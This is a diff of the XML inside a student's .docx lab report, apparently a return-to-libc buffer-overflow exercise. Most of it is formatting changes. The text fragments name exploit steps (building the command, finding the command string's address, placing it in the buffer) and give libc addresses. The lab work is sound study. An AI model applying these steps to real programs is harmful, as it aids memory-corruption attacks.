-              <w:szCs w:val="24"/>
-            </w:rPr>
-            <m:t>.</m:t>
-          </m:r>
-          <m:r>
-            <w:rPr>
-              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
-              <w:sz w:val="24"/>
-              <w:szCs w:val="24"/>
-            </w:rPr>
-            <m:t>9073×</m:t>
+            <m:t>=1.9073×</m:t>
           </m:r>
           <m:sSup>
             <m:sSupPr>
@@ -8995,15 +8939,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>ion</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> table:</w:t>
+        <w:t>ion table:</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -9032,7 +8968,7 @@
             <w:pPr>
               <w:jc w:val="center"/>
               <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
@@ -9063,7 +8999,7 @@
             <w:pPr>
               <w:jc w:val="center"/>
               <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
@@ -9094,7 +9030,7 @@
             <w:pPr>
               <w:jc w:val="center"/>
               <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
@@ -9125,7 +9061,7 @@
             <w:pPr>
               <w:jc w:val="center"/>
               <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
@@ -9156,7 +9092,7 @@
             <w:pPr>
               <w:jc w:val="center"/>
               <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
@@ -9192,7 +9128,7 @@
             <w:pPr>
               <w:jc w:val="center"/>
               <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
@@ -9215,7 +9151,7 @@
             <w:pPr>
               <w:jc w:val="center"/>
               <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
@@ -9246,7 +9182,7 @@
             <w:pPr>
               <w:jc w:val="center"/>
               <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
@@ -9277,7 +9213,7 @@
             <w:pPr>
               <w:jc w:val="center"/>
               <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
@@ -9308,7 +9244,7 @@
             <w:pPr>
               <w:jc w:val="center"/>
               <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
@@ -9344,7 +9280,7 @@
             <w:pPr>
               <w:jc w:val="center"/>
               <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
@@ -9375,7 +9311,7 @@
             <w:pPr>
               <w:jc w:val="center"/>
               <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
@@ -9406,7 +9342,7 @@
             <w:pPr>
               <w:jc w:val="center"/>
               <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
@@ -9437,7 +9373,7 @@
             <w:pPr>
               <w:jc w:val="center"/>
               <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
@@ -9468,7 +9404,7 @@
             <w:pPr>
               <w:jc w:val="center"/>
               <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
@@ -9677,6 +9613,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -9765,6 +9702,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -10012,17 +9950,17 @@
       <w:pPr>
         <w:jc w:val="left"/>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
         <w:t>S</w:t>
       </w:r>
       <w:r>
@@ -10144,7 +10082,7 @@
       <w:pPr>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -10188,6 +10126,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -10259,15 +10198,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">also by using </w:t>
+        <w:t xml:space="preserve">, also by using </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -10300,6 +10231,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -10344,7 +10276,7 @@
       <w:pPr>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -10381,134 +10313,94 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>before the first line in main</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>The signal type is SIG</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>SEGV</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+        <w:t xml:space="preserve"> before the first line in main. The signal type is SIGSEGV.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -10778,15 +10670,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>1) D</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>esign the command</w:t>
+        <w:t>1) Design the command</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10802,15 +10686,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> we </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>need</w:t>
+        <w:t xml:space="preserve"> we need</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10998,15 +10874,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>2) F</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>ind the command</w:t>
+        <w:t>2) Find the command</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11060,43 +10928,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Here's a trap</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>, and</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> I made this mistake the first time I did it</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. We need to find the address of command from </w:t>
+        <w:t xml:space="preserve">(Here's a trap, and I made this mistake the first time I did it. We need to find the address of command from </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -11382,17 +11214,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>):</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 0xb7e42da0</w:t>
+        <w:t>): 0xb7e42da0</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11426,27 +11248,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>0xb7e369d0</w:t>
+        <w:t>): 0xb7e369d0</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11490,54 +11292,44 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>0xb7f6382b</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+        <w:t>: 0xb7f6382b</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -11559,39 +11351,7 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">(3) </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>L</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ocate </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>the commands</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> properly in the </w:t>
+        <w:t xml:space="preserve">(3) Locate the commands properly in the </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -11637,15 +11397,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>36]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>36].</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15318,6 +15070,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -15362,7 +15115,7 @@
       <w:pPr>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -15484,17 +15237,17 @@
       <w:pPr>
         <w:jc w:val="left"/>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
         <w:t>O</w:t>
       </w:r>
       <w:r>
@@ -15521,15 +15274,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">After task 2 I think the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>return-to-</w:t>
+        <w:t>After task 2 I think the return-to-</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -15616,7 +15361,7 @@
       <w:pPr>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>

--- a/Project_2_Report_Enze_Xu.docx
+++ b/Project_2_Report_Enze_Xu.docx
@@ -6,6 +6,74 @@
       <w:pPr>
         <w:jc w:val="left"/>
